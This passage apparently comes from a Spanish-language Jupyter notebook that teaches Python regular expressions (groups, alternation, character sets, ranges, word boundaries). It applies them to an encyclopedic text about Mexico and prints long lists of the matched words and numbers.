fue el primer intento de una liga profesional de voleibol en México, ya que anteriormente la Liga Premier de Voleibol (LPV)\n(LFA), con el respaldo de la Federación Mexicana de Fútbol Americano (FMFA), misma que entró en vigor en febrero de dicho año con 4 equipos, 3 de la Ciudad de México y 1 del Estado de México, teniendo como sede el Estadio Jesús Martínez \"Palillo\" de la Ciudad Deportiva de La Magdalena Mixiuhca. En la actualidad está conformada por ocho equipos, tres de ellos de la Ciudad de México, dos del Estado de México, uno de Coahuila, uno de Nuevo León y uno más de Puebla. Además en 2018 se fundó la Liga Fútbol Americano de México (FAM)\n(LMEH)\n(Varonil), Frontón Cubano (Varonil), Frontón a Mano con Pelota Dura en Tres Paredes y en Trinquete (Varonil), Pala Corta (Varonil), Paleta con Pelota de Cuero en 3 Paredes y en Trinquete (Varonil), Paleta con Pelota de Goma en 3 Paredes (Varonil) y en Trinquete (Femenil y Varonil); así como Frontenis (Femenil y Varonil)\n(50 de oro, 41 de plata y 32 de bronce)\n(Federación Internacional del Automóvil por sus siglas en francés)\n(levantadora de pesas)\n(1968) y un Campeonato Mundial de Fútbol (1970) en un período de dos años (Después lo lograrían Alemania: Juegos Olímpicos en 1972 y Mundial 1974; Estados Unidos: Mundial 1994 y Juegos Olímpicos de 1996; y Brasil: Copa del Mundo de 2014 y Juegos Olímpicos de 2016)\n\n ############\n ############\n ############\n\n()\n(31 estados y la capital federal)\n(principalmente el segundo tercio)\n(PIB)\n(PPA)\n(Capitanía General de Guatemala, Cuba, Florida, Puerto Rico y la parte española de la isla de Santo Domingo —hoy República Dominicana—)\n(usado como adjetivo)\n(Plan de Iguala y Tratados de Córdoba)\n(América Septentrional y América Mexicana)\n(s. XVI)\n(maguey)\n(liebre)\n(locativo)\n(tli)\n(luna)\n(tli)\n(ombligo, centro)\n(locativo)\n(12 000 a. C.)\n(8000 a. C.)\n(1000 a. C.)\n(10 500 a. C.)\n(siglos XV-IV a. C.)\n(Estado de México)\n(Que significa «serpiente emplumada»)\n(que significa: «néctar de la tierra», aunque a este Dios también lo veneraban en la cultura maya y zapoteca)\n(teocracia)\n(el dios creador de los mayas quiches)\n(el dios creador de los mayas yucatecos)\n(dios del bordado y la pintura)\n(Quetzalcóatl)\n(dios del viento)\n(dios del sol)\n(diosa de la luna)\n(dios del agua)\n(dios del maíz y la agricultura)\n(dios de la muerte)\n(o aztecas)\n(1517)\n(1518)\n(1546)\n(1540-1551)\n(1734-1737)\n(1761)\n(notoriamente, Zacatecas y Guanajuato)\n(golfo de México)\n(océano Pacífico)\n(también llamado Monte Pío)\n(en especial desde la llegada de los Borbones, que propugnaron el modelo francés de colonización, contra los cuales los criollos o hijos de españoles nacidos en México empezaron a resentirse)\n(Guanajuato)\n(en cualquiera de sus variantes como bandos antagónicos: republicanos contra monárquicos y federalistas contra centralistas)\n(los actuales estados de California, Arizona, Nuevo México, Nevada y Utah; y porciones de Colorado, Oklahoma, Kansas y Wyoming)\n(1853-1855)\n(1906)\n(1907)\n(Tlaxcalantongo, 1920)\n(Chinameca, 1919)\n(Parral, 1923)\n(PNR)\n(PRI)\n(1934-1940)\n(1988-1994)\n(CCRI-CG)\n(EZLN)\n(y estos por Municipios)\n(capital del país)\n(Ejecutivo)\n(Legislativo)\n(Fiscalía General de la República, CNDH, Auditoria Superior de la Federación, Banco de México, INEGI, Cofece, IFT e INAI)\n(si la ausencia es el día de la toma de posesión, sería el presidente del Senado, el mandatario provisional)\n(y repartida entre las dos cámaras)\n(excepto el Presidente, cuestión que corresponde al Senado)\n(INE, CNDH, Auditoria Superior, Banco de México, INEGI, Cofece e IFT)\n(a través de la Guardia Nacional)\n(abarcando catorce artículos)\n(civil, penal, constitucional, mercantil, laboral, administrativo, fiscal, procesal, etc.)\n(policía estatal y guardia nacional adscrita)\n(ayuntamiento)\n(espacio aéreo, mares e )\n(31 estados y la Ciudad de México, capital de la república)\n(Instituto Nacional Electoral, Tribunal electoral y Fiscalía electoral)\n(bajo su anterior denominación \"IFE\")\n(PRD)\n(PAN)\n(PRI)\n(PT)\n(Verde)\n(MC)\n(Movimiento Regeneración Nacional)\n(2000-2006)\n(OEA)\n(particularmente con Cuba, Venezuela, Bolivia y Ecuador)\n(y todos los organismos conexos del sistema de Naciones Unidas)\n(ningún otro país del mundo tiene un número similar en una sola nación receptora)\n(a cargo del Ejército Mexicano y la Fuerza Aérea Mexicana)\n(a cargo de la Armada de México)\n(para las dos primeras ramas)\n(a 3395 msnm de altitud)\n(5610 m)\n(5462 m)\n(5286 m)\n(4690 m)\n(4461 m)\n(4340 m)\n(4117 m)\n(2054 m)\n(Socorro, Clarión, San Benedicto, roca Partida)\n(una zona tropical y una templada)\n(que concentra el 80% de la población mexicana)\n(12 °C)\n(16,1 °C)\n(1885 millas)\n(ecosistemas inalterados)\n(zonas con rica diversidad de especies)\n(20 hembras y 3 machos)\n(de las que a la fecha solo se conservan dos: Pemex y la Comisión Federal de Electricidad)\n(básicamente, hacia Estados Unidos)\n(NAFTA, por sus siglas en inglés, o TLCAN)\n(Luxemburgo, Suiza, Liechtenstein y Noruega)\n(\"World Government Bond Index\", en inglés)\n(exploración, refinación, comercialización y exportación)\n(Petróleos Mexicanos)\n(particularmente la española)\n(TTCI por sus siglas en inglés)\n(H1N1)\n(H1N1)\n(Coneval)\n(CFE)\n(centro del país)\n(LFC)\n(Pemex)\n(a diciembre de 2007)\n(PEMEX)\n(CAPUFE)\n(Imevisión)\n(Televisa, TV Azteca e Imagen Televisión)\n(IMER)\n(nacional e internacional)\n(Internet)\n(\"100 mexicanos dijeron\" y \"Qué dice la gente\")\n(programas estadounidenses)\n(en orden alfabético)\n(SPR)\n(destacando, Multimedios Televisión y Canal 13.1 HD de Telsusa)\n( y solo 1 hay en San Luis Potosí)\n(tienen hasta 100 estaciones en todo el estado)\n(solo seis)\n(Ensenada, Mexicali y Tijuana)\n(1950-1980)\n(CONAPO)\n(en 1895)\n(en el año 2000)\n(pueblos, rancherías, caseríos)\n(50,6% del total)\n(Coahuila y Durango)\n(Tamaulipas y Veracruz)\n(1925)\n(Inegi)\n(anteriormente el Instituto Nacional Indigenista)\n(INI)\n(1 de cada 100 habitantes)\n(Estados Unidos y Guatemala)\n(IISS)\n(SESNSP)\n(Iglesia católica y Estado)\n(casi 93 millones de adeptos según el censo de 2010)\n(Séptimo Día)\n(como la Iglesia Anglicana, Presbiteriana, Metodista, Bautista)\n(en textos editados por la Universidad Nacional Autónoma de México)\n(sobre todo en los últimos años)\n(principalmente en estados como Veracruz y Yucatán)\n(cerca del 3 por ciento del universo contemplado en los tabulados del INEGI)\n(el tequio o trabajo comunitario, la participación en las fiestas patronales y cuestiones similares)\n(ILV)\n(algo que en las escuelas públicas de México se realiza cada lunes)\n(en Polanco, Tecamachalco, Interlomas, Santa Fe, Satélite y en el Centro Histórico)\n(zen y tibetano)\n(la información varía según las diversas fuentes)\n(o \"Plattdeutsch\")\n(o «bajo alemán»)\n(27.2% del total de discapacitados a nivel nacional)\n(29% de la población)\n(literatura)\n(paz)\n(química)\n(el carácter de lo mexicano, la mexicanidad, la definición de lo mexicano)\n(monocordio)\n(es decir, el traje de los ricos hacendados ganaderos)\n(y continúan haciéndolo)\n(huapango)\n(especialmente del son cubano)\n(bambuco colombiano)\n(algo así como una \"suite\" mexicana)\n(farmacéuticos)\n(término no muy claro)\n(María del Rosario Graciela Rayas Trejo)\n(grupero)\n(o rock nacional, representado por Maná, El Tri, Molotov, Caifanes, Café Tacvba, Julieta Venegas y Panda, entre otros)\n(mariachi light)\n(de metales y alientos)\n(que algunos etnomusicólogos afirman, nació en Coahuila)\n(cazadores)\n(para no ser reconocidos)\n(a partir de que la filosofía llega a las Universidades como disciplina de estudio profesional)\n(mayas, olmecas, toltecas, mixtecas, aztecas)\n(del náhuatl; obrero o alarife)\n(España-Marruecos)\n(1944)\n(declarada Memoria del Mundo por la UNESCO en 2003)\n(conocido en casi todo el mundo hispanoparlante como \"ají\")\n(biznaga)\n(menonitas)\n(\"¿Cuánto vale la cultura?\")\n(I.N.A.H.)\n(I.N.B.A.)\n(1993 y 2001)\n(escrito y pronunciado \"beisbol\", localmente)\n(LMB)\n(LMP)\n(Zona Norte y Zona Sur)\n(mexicanos y extranjeros)\n(LIV)\n(LIBN)\n(LNM)\n(LNS)\n(LMBL)\n(LEB)\n(LNC)\n(LIM)\n(LPB)\n(LMI)\n(LVEB)\n(LTB)\n(escrito y pronunciado \"basquetbol\", en el propio país)\n(LNBP)\n(LMBPF)\n(CIBACOPA)\n(CIBAPAC)\n(LBS)\n(CIBANE)\n(LPB)\n(LBE)\n(CIMEBA)\n(LMV)\n(FMVB)\n(LMVV)\n(LMVF)\n(LPV)\n(LFA)\n(FMFA)\n(FAM)\n(LMEH)\n(Varonil)\n(Varonil)\n(Varonil)\n(Varonil)\n(Varonil)\n(Varonil)\n(Femenil y Varonil)\n(Femenil y Varonil)\n(50 de oro, 41 de plata y 32 de bronce)\n(Federación Internacional del Automóvil por sus siglas en francés)\n(levantadora de pesas)\n(1968)\n(1970)\n(Después lo lograrían Alemania: Juegos Olímpicos en 1972 y Mundial 1974; Estados Unidos: Mundial 1994 y Juegos Olímpicos de 1996; y Brasil: Copa del Mundo de 2014 y Juegos Olímpicos de 2016)\n" ] ], [ [ "Matamos dos pajaros de un tiro, podemos analizar la diferencia entre una expresión codiciosa y una reacia; y además, observamos un uso de la diagonal invertida (`\\`): Cancelar el efecto de los símbolos especiales.", "_____no_output_____" ], [ "##### ( )", "_____no_output_____" ], [ "Los paréntesis tienen exactamente el efecto que uno podría esperar: agrupar. Eso quiere decir que se puede aplicar instrucciones a mas de un caracter a la vez.", "_____no_output_____" ] ], [ [ "expresion_parentesis = re.compile(r\"(el)?(los)? país(es)?\")\nbusqueda = expresion_parentesis.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", " país\nel país\nel país\n país\nel país\nel país\n país\nel país\nlos países\n países\n país\nel país\nel país\nel país\nel país\n país\nel país\nel país\nel país\n país\nel país\nel país\n país\nel país\nel país\nel país\nel país\nel país\nel país\n país\nel país\nel país\nel país\n país\n país\n país\nel país\n países\nel país\nel país\n país\n países\nel país\nel país\nel país\n país\nel país\n país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\n países\n país\nel país\nel país\n países\n país\n país\nel país\nel país\nel país\n país\nel país\nel país\nel país\nel país\nel país\n país\n países\n país\nlos países\nel país\nel país\nel país\nlos países\nel país\n país\n países\nel país\nel país\n países\nel país\nel país\n países\nel país\n países\n países\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\n país\nel país\n país\nel país\nlos países\nel país\nel país\nel país\nel país\nel país\nel país\n país\nel país\nel país\n países\n países\n país\n país\nel país\n país\n país\nel país\n país\n países\n país\n país\n país\nel país\n países\nel país\nel país\nel país\nel país\nel país\nel país\nel país\n países\nel país\n país\nel país\nel país\nel país\nel país\n países\nel país\nel país\nel país\nel país\nel país\nel país\n países\nel país\nel país\nel país\n país\n países\nel país\nel país\n país\nel país\nel país\nel país\n países\nel país\n país\nel país\nel país\nlos países\nel país\nel país\nlos países\n países\nlos países\nel país\nel país\nel país\nel país\nel país\n país\nel país\nel país\n país\nel país\nel país\nel país\nel país\nel país\nel país\n país\nel país\n país\n país\n" ] ], [ [ "##### |", "_____no_output_____" ], [ "Podemos ver que el código anterior es mas o menos equivalente a buscar \"el país\" o \"los países\" o incluso solo \"países\". Pero con esa construcción, en realidad también se podrían encontrar cosas como \"ellos países\" si es que algo así estuviera en el texto.\n\nAfortunadamente las expresiones regulares cuentan con instrucción específica para lograr un OR.", "_____no_output_____" ] ], [ [ "expresion_barra = re.compile(r\"(el|los) país(es)?\")\nbusqueda = expresion_barra.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "el país\nel país\nel país\nel país\nel país\nlos países\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nlos países\nel país\nel país\nel país\nlos países\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nlos países\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nlos países\nel país\nel país\nlos países\nlos países\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\nel país\n" ] ], [ [ "##### [ ]", "_____no_output_____" ], [ "Los corchetes tienen la función de formar conjuntos de caracteres. Hasta ahora hemos usado punto (`.`) para cuando queremos acpetar más de un posible caracter. En expresiones como: `r\"M..ic.\"` ; la naturaleza del texto provocó que solo se obtuvieran cosas relacionadas con México, pero fácilmente la expresión hubiera aceptado \"Mítico\" también. Para esos casos podemos tener conjuntos de caracteres restringidos que se pueden aceptar.", "_____no_output_____" ], [ "Además, los conjuntos se pueden formar como rangos, o también pueden usarse como negación de conjuntos.", "_____no_output_____" ] ], [ [ "expresion_corchetes = re.compile(r\"[Mm].[xj]ic[^ \\n]+\")\nbusqueda = expresion_corchetes.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "México\">\nMéxico\nMéxico\nMexicanos,\nMéxico.\nmexicano\nMéxico\nMéxico\nMéxico\nMéxico\nmexicano\nMéxico\nmexica\nMéxico,\nmexicanos.\nMéxico\nMéxico\nMexicana\nMéxico\"\nMexicana),\nMejicano.\nMexicano,\nMexicanos,\nMexicana\"\nMexicanos\".\nMexicana,\nMexicanos\".\nMexicanos\".\nMéxico\",\nmexicano\"\nmexicanos\nMéxico-Tenochtitlan\nMéxico\nmexicanos.\nMéxico\"\nmexicano\nmexicas.\nmexicas\nMéxico\nMéxico\nMéxico\nMéxico,\nMéxico\nMéxico),\nMéxico:\nMéxico\nMexicas\nMéxico,\nmexicas\nMéxico-Tenochtitlán.\nmexica\nMéxico-Tenochtitlan.\nmexicas,\nmexicas\nMéxico-Tenochtitlan,\nMéxico.\nMéxico\nMéxico\nMéxico;\nMéxico)\nMéxico\nMéxico\nMéxico.\nMéxico,\nMéxico\nmexicano,\nmexicanas\nMéxico.\nMéxico\nMéxico\nMéxico\nmexicano\nMéxico,\nmexicana.\nMéxico\nMexicano,\nMéxico.\nMéxico\nMéxico\nmexicano.\nmexicana\nMéxico\nMéxico.\nmexicano\nmexicano\nMéxico\nMéxico\nmexicano\nmexicano\nMéxico,\nMexicanos\nMéxico\nmexicano.\nMéxico,\nMexicanos\nMéxico,\nmexicano;\nMexicana\nmexicanos\nMéxico—.\nmexicana\nMéxico\nMéxico\nMexicanos;\nMéxico,\nMéxico\nmexicano\nmexicana\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nmexicanas.\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMexicano\nMexicana)y\nMéxico).\nMéxico.\nmexicanas\nMexicana,\nMéxico\nMéxico\nMéxico\nMéxico\nmexicano\nMéxico:\nmexicano\nMexicana,\nMéxico,\nmexicana.\nMéxico\nMéxico\nMexicali,\nMéxico\nMéxico,\nMéxico.\nmexicano,\nMexicana.\nmexicana),\nMéxico\nMexicali,\nMéxico\nmexicanos\nMéxico\nMéxico;\nMéxico.\nMéxico;\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nmexicanas.\nmexicano\nMéxico,\nMéxico;\nmexicano\nmexicana\nMéxico.\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico.\nmexicanos\nMéxico\nmexicanas,\nmexicano.\nMéxico\nmexicana\nMéxico\nmexicano.\nmexicano;\nmexicana.\nMéxico\nMéxico\nmexicana\nMéxico\nmexicanos\nmexicana\nMéxico\nmexicana,\nMéxico\nmexicanas\nMéxico\nMéxico\nMéxico\nMexicanos),\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nmexicana.\nMéxico\nMéxico\nMéxico\nmexicano\nmexicanos\nMéxico\nMéxico,\nMéxico\nmexicano\nMéxico,\nmexicanas\nmexicano\nmexicanos\nmexicano\nmexicanos\nmexicanos\nmexicanos\nMéxico,\nmexicana\nMéxico\nmexicana,\nmexicanas\nMexicano\"\nmexicano,\nMéxico\nMéxico\nmexicanos\nMéxico\nmexicanos.\nmexicana\nMéxico,\nMexicanos\nmexicanos\nMéxico\nMéxico\nMéxico\nMexicanos\nMéxico,\nMéxico\nMéxico,\nMéxico\nMéxico,\nMéxico\nMéxico\nMéxico,\nMéxico\nMéxico\nMexicali,\nMéxico\nMéxico\nMéxico\nMéxico.\nMéxico,\nMexicana,\nMéxico\nMéxico\nMéxico\nMéxico.\nMexicano\nMexicano\nMexicano\nMéxico\nMéxico.\nMexicano\nMéxico,\nMéxico\nmexicanos\nMéxico\nMéxico\nMéxico\nMéxico,\nmexicanos\nMéxico\".\nMéxico\nMéxico\nMéxico\nMéxico,\nMexicano\nMéxico,\nMéxico,\nMéxico\nMexicali\nMéxico\nMéxico,\nMéxico\nmexicano\nMéxico\nmexicana.\nmexicana\nmexicanos.\nmexicanos.\nmexicanos\nMéxico,\nMéxico,\nMéxico,\nMéxico\nMéxico,\nMéxico,\nMéxico\nMexicana\nmexicano\nMéxico\nMéxico\nmexicanos.\nMéxico\nmexicana.\nMéxico\nMéxico,\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico,\nMéxico\nmexicanos\nMéxico\nmexicanos\nMéxico\nMéxico\nMéxico,\nMéxico\nMéxico\nmexicano.\nMéxico\nmexicano\nMéxico,\nMéxico\nmexicano\nmexicana\nmexicano\nmexicanos\nmexicana\nMéxico.\nMéxico),\nmexicana\nMéxico\nMéxico\nmexicano\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico,\nmexicanas.\nmexicanos.\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico.\nmexicano,\nMéxico,\nMéxico,\nMéxico,\nMéxico,\nMéxico\nMéxico\nMéxico,\nMexicali,\nmexicana,\nmexicanos.\nMéxico\nmexica\nmexica\nMéxico\nMéxico\nMéxico\nmexicanos\nMéxico\nMéxico,\nMéxico,\nMéxico,\nMéxico,\nMéxico,\nMéxico,\nmexicano,\nMéxico\nMexicano,\nMéxico\nMéxico\nMéxico\nMexicanos\nmexicana,\nmexicano\"\nmexica;\nmexicanos\nmexicano;\nmexica\",\nMéxico\".\nmexicano\"\nMexicanos\nmexicana.\nmexicano\"\nMéxico\nMéxico,\nmexicano.\nmexicano,\nmexicanidad,\nmexicano)\nmexicanos\nMéxico\nmexicanos,\nmexicana\nmexicana\nmexicano\nMéxico\nmexicana\nmexicanos\nmexicana\nMexicana,\nMéxico.\nmexicana\nMéxico\nmexicana\nmexicana,\nMéxico\nmexicanos.\nmexicana\nmexicana\nMéxico,\nMéxico,\nmexicano,\nmexicana)\nmexicana\"\nmexicanos\nMéxico\nmexicana\nmexicana\nmexicanos,\nMéxico\nMéxico\nmexicano\nmexicano\nMéxico,\nmexicanos\nmexicanos\nmexicano,\nMéxico\nMéxico.\nmexicano\nmexicanos,\nmexicanos\nmexicana,\nmexicana\nMéxico\nmexicanos\nMéxico.\nmexicanos\nmexicanos,\nmexicanos\nMéxico,\nmexicana\nmexicanos,\nmexicana\nMéxico.\nmexicanos\nmexicanas;\nMéxico\nMéxico\nMéxico\nmexicanos\nMéxico\nMéxico\nmexicano,\nmexicana\nMéxico\nmexicana\",\nmexicana.\nmexicanos\nMéxico.\nmexicano\nMéxico\nmexicas,\nmexicano.\nmexicana\nMéxico\nMéxico\nMéxico\nMéxico.\nMéxico,\nmexicana\nmexicano\nMéxico-Tenochtitlan,\nMéxico\nmexicana\nMéxico\nmexicana\nMéxico,\nMéxico\nmexicana\nmexicanas\nmexicanas\nmexicano\nmexicano,\nmexicano\nmexicano,\nMéxico,\nmexicano\nmexicano\nMéxico,\nMéxico\nMéxico\nmexicana.\nmexicana\nmexicana\nmexicanos.\nmexicanos.\nmexicanas\nmexicana.\nmexicana.\nMéxico\nMéxico.\nmexicana,\nMéxico\nmexicana.\nMéxico\nmexicanas.\nmexicana:\nMéxico.\nMéxico\nMéxico\nMéxico,\nMéxico.\nMéxico,\nMéxico\nmexicana\nmexicana,\nMéxico,\nMéxico.\nMéxico\nMéxico\nMéxico\nMexicana;\nmexicanos.\nMéxico\nmexicano\nmexicana\nMéxico\nmexicana\nMéxico\nmexicano,\nMéxico.\nMéxico\nMexicana\nMexicana\nmexicanos\nmexicanos\nMéxico\nmexicanas.\nMéxico\nMéxico\nMéxico\nMexicana\nMéxico\nmexicano\nMéxico\nMéxico\nMéxico,\nMéxico\nmexicano,\nMexicana\nMexicano\nMéxico.\nmexicano\nMexicana\nMexicana\nMexicana\nMexicana\nMéxico,\nmexicano\nmexicano,\nMexicana\nMéxico\nMéxico,\nMéxico,\nMéxico,\nMéxico\nMéxico,\nMéxico,\nMexicana\nMéxico\nMéxico.\nMéxico\nMexicana\nMéxico\nmexicanas\nMexicana\nMéxico\nmexicano\nMéxico:\nMéxico\nMéxico\nMéxico\nmexicanos\nMéxico,\nMéxico.\nMéxico\nMéxico,\nMéxico\nmexicano\nmexicanos\nMéxico\nmexicanos\nmexicanos\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico.\nMéxico\nmexicano\nmexicana\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\nMéxico\n" ], [ "expresion_rango = re.compile(r\"[0-9]+\")\nbusqueda = expresion_rango.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "1830\n1830\n32\n31\n3155\n958\n276\n9330\n126\n2019\n67\n287\n14\n000\n300\n1810\n1821\n0\n774\n74\n17\n10\n12\n12\n000\n6\n1813\n22\n1814\n28\n1821\n1824\n1857\n1917\n30\n000\n9000\n12\n000\n8000\n1000\n10\n500\n2500\n1500\n200\n200\n900\n900\n900\n1300\n1521\n1517\n1518\n1520\n13\n1521\n1525\n1527\n1535\n300\n1546\n1540\n1551\n1734\n1737\n1761\n8\n300\n1808\n16\n1810\n1811\n1813\n1815\n1815\n1817\n1820\n1821\n28\n1821\n1822\n1823\n1824\n1833\n1835\n1836\n1841\n1848\n1846\n1848\n1845\n1824\n1853\n1855\n1854\n1857\n1867\n1872\n1876\n1906\n1907\n1910\n14\n20\n24\n1911\n1913\n1914\n1917\n1920\n1919\n1923\n1924\n1929\n1934\n1934\n1940\n1950\n1960\n1959\n1968\n1970\n1977\n1985\n1988\n1994\n1994\n1\n1994\n22\n1997\n45\n2000\n71\n2006\n100\n000\n15\n273\n2010\n2012\n2006\n2012\n1\n2018\n53\n3\n1\n2018\n2024\n1917\n128\n500\n1917\n111\n110\n1917\n2466\n570\n5\n32\n31\n1988\n2019\n1970\n1980\n2000\n2006\n20\n5\n3\n80\n67\n7\n3\n150\n50\n87\n7\n66\n297\n198\n201\n2020\n127\n586\n94\n028\n33\n557\n32\n14\n86\n118\n5127\n3155\n958\n276\n9330\n3\n117\n7\n8\n475\n1\n17\n32\n17\n56\n3\n153\n35626\n15\n3395\n5610\n5462\n5286\n4690\n4461\n4340\n4117\n2054\n5073\n30\n50\n15\n6\n40\n614\n16\n7\n21\n1\n2745\n10\n20\n1000\n1500\n1500\n24\n26\n350\n15\n25\n70\n635\n460\n254\n80\n1000\n3000\n19\n12\n16\n1\n3034\n1885\n17\n200\n000\n10\n12\n733\n448\n290\n26\n000\n2500\n170\n000\n34\n64\n4\n26\n4\n17\n1922\n2005\n23\n20\n3\n13\n2010\n1830\n1876\n1910\n20\n000\n1910\n1940\n1970\n6\n27\n1970\n1983\n1994\n4\n85\n30\n2006\n2006\n4\n5\n3\n5\n4\n70\n100\n000\n70\n000\n2006\n20\n000\n2008\n4\n54\n2006\n0\n9\n0\n5\n44\n4\n18\n2006\n2600\n5700\n2006\n2010\n51\n217\n4\n17\n2012\n151\n480\n72\n000\n2005\n2006\n2006\n1994\n1995\n85\n10\n1980\n40\n12\n1970\n2007\n2009\n23\n4\n2011\n2012\n2005\n5\n7\n14\n2\n11\n270\n2009\n15\n25\n2011\n43\n2009\n1\n1\n2010\n1\n1\n5000\n8\n43\n6\n2016\n53\n418\n151\n7\n6\n375\n581\n22\n6\n0\n774\n74\n2010\n0\n743\n0\n608\n2009\n2004\n23\n830\n51\n9\n9900\n21\n6\n5000\n2003\n5\n95\n1\n35\n959\n50\n2007\n3\n24\n4\n000\n667\n150\n000\n2400\n2011\n35\n796\n2004\n3\n826\n2005\n12\n000\n882\n000\n366\n095\n2008\n10000\n40\n000\n17\n166\n2010\n80\n2010\n1819\n2016\n2018\n10\n5\n14\n2007\n1990\n22\n733\n854\n634\n80\n2004\n32\n302\n2007\n56\n13\n40\n6\n2011\n100\n13\n1\n1585\n5\n1\n852\n728\n100\n1920\n2\n1910\n1920\n1930\n1980\n3\n1950\n1980\n2000\n120\n1\n6\n1995\n2000\n36\n1895\n72\n2000\n90\n1960\n50\n6\n1895\n96\n6\n1920\n90\n80\n18\n50\n2004\n2010\n1\n640\n000\n1\n600\n940\n1\n400\n000\n1\n8\n2\n1925\n6\n10\n14\n10\n220\n000\n2000\n11\n65\n1\n381\n853\n1\n100\n2015\n75\n80\n20\n824\n2016\n23\n000\n2016\n2017\n25\n339\n25\n324\n2006\n2019\n2020\n1857\n1917\n1824\n1920\n1917\n1990\n1993\n93\n2010\n1\n1\n3\n30\n5000\n93\n8\n93\n4\n93\n2\n84\n5\n3\n1979\n18\n000\n1992\n500\n67\n400\n67\n7\n67\n100\n10\n50\n1882\n7500\n5000\n5000\n50\n000\n87\n000\n100\n000\n400\n500\n13\n2010\n1\n292\n201\n27\n2\n10\n130\n000\n3\n1921\n26\n48\n65\n2009\n5\n20\n40\n25\n8\n1970\n8\n4\n2005\n7\n3\n2010\n33\n29\n21\n1551\n25\n1553\n22\n1910\n100\n2010\n123\n1910\n1711\n2000\n98\n1940\n1970\n6\n8\n30\n1940\n1960\n50\n1960\n1970\n1980\n1970\n90\n1920\n40\n50\n1960\n1849\n7500\n2001\n1820\n1880\n1940\n1950\n1944\n1994\n2003\n1844\n1851\n20\n000\n2005\n16\n2010\n1847\n6\n7\n2004\n3\n6\n2005\n37\n266\n28\n34\n232\n2012\n0\n47\n20\n2010\n13\n2010\n30\n2010\n15\n1970\n1986\n10\n1999\n1993\n2001\n14\n2012\n17\n17\n2005\n2011\n20\n1977\n2011\n2007\n1925\n16\n2\n2006\n2009\n2017\n4\n1951\n1936\n2013\n2014\n2016\n1955\n2016\n4\n3\n1\n2018\n1930\n2\n2010\n1895\n17\n26\n1916\n12\n1990\n2\n3\n8\n21\n3\n120\n3\n3\n123\n50\n41\n32\n1968\n1992\n2\n3\n1968\n3\n2\n2\n1992\n1984\n2002\n2010\n2008\n2015\n1\n23\n1900\n1968\n12\n24\n1984\n2000\n2004\n2002\n2\n2002\n2003\n1970\n1986\n1986\n3\n1955\n1975\n2011\n1926\n1954\n1990\n2014\n1979\n1968\n1970\n1972\n1974\n1994\n1996\n2014\n2016\n1928\n1984\n1988\n1992\n1994\n2002\n2010\n1972\n1976\n1980\n1984\n1988\n1992\n1996\n2000\n2004\n2008\n2012\n2006\n2010\n2010\n2012\n" ] ], [ [ "##### \\", "_____no_output_____" ], [ "Por último, la barra invertida. Ya la había mencionado, sirve para eliminar el significado especial, pero tiene otro uso.\n\nAsí como quita significado a los caracteres especiales, le da significado especial a caracteres normales para formar conjuntos preestablecidos (conjuntos como los que se podrían formar con los corchetes: `[ ]`)", "_____no_output_____" ], [ "* `\\d` : Conjunto de dígitos (`[0-9]`)\n* `\\s` : Conjunto de espacios en blanco (espacio, tabulador, entre otros)\n* `\\w` : Conjunto de elementos de palabra (letras, números y guión bajo)\n* `\\b` : Separador de palabras (no coincide con ningún caracter como tal)", "_____no_output_____" ] ], [ [ "# Palabras de 12 letras\nexpresion_12letras = re.compile(r\"\\b\\w{12}\\b\")\nbusqueda = expresion_12letras.finditer(texto)\n\nfor resultado in busqueda:\n print(resultado.group(0))", "oficialmente\nprecolombina\nOrganización\nconsiderados\ndecimocuarta\nmegadiversos\ndenominación\nConstitución\ncorrespondía\ndependientes\nconstituiría\ndenominación\nantecedieron\nconformación\nConstitución\nConstitución\nConstitución\ngeneralizado\nprevaleciera\nTenochtitlan\npeninsulares\ndenominación\nsignificaría\nalternativos\nconocimiento\nrecolectores\ncultivadores\ncomplementar\nsubsistencia\nConstruyeron\narqueológica\nAridoamérica\ncivilización\ncaracterizan\nmonumentales\narquitectura\nconstruirlas\ncivilización\nceremoniales\nconstruyeron\nsignificaban\nherramientas\nQuetzalcóatl\nrelacionados\nteotihuacana\ncomerciantes\nagricultores\nQuetzalcóatl\ncivilización\nastronómicos\nrelacionadas\nrelacionaban\nQuetzalcóatl\nconstruyeron\nastronómicas\nrelacionadas\nrelacionados\nconstruyeron\narquitectura\ncalendáricos\nobservatorio\nconstelación\ncomerciantes\ncomerciantes\nXicocotitlan\nfuncionarios\nconocimiento\ncivilización\nprehispánica\nsubsistencia\ntopográficas\nTenochtitlán\nconquistados\nexpediciones\nTenochtitlan\nTenochtitlan\naculturación\nTenochtitlan\nnotoriamente\ngradualmente\nprivilegiada\nconvirtieron\ntransportaba\nintroducción\narquitectura\nmicrocrédito\njurisdicción\nconsiderados\nnovohispanos\notorgamiento\ncolonización\nevolucionado\nsoberanistas\nconstitución\nConstitución\nproclamación\ninstauración\ninsurrección\nConstitución\nrepu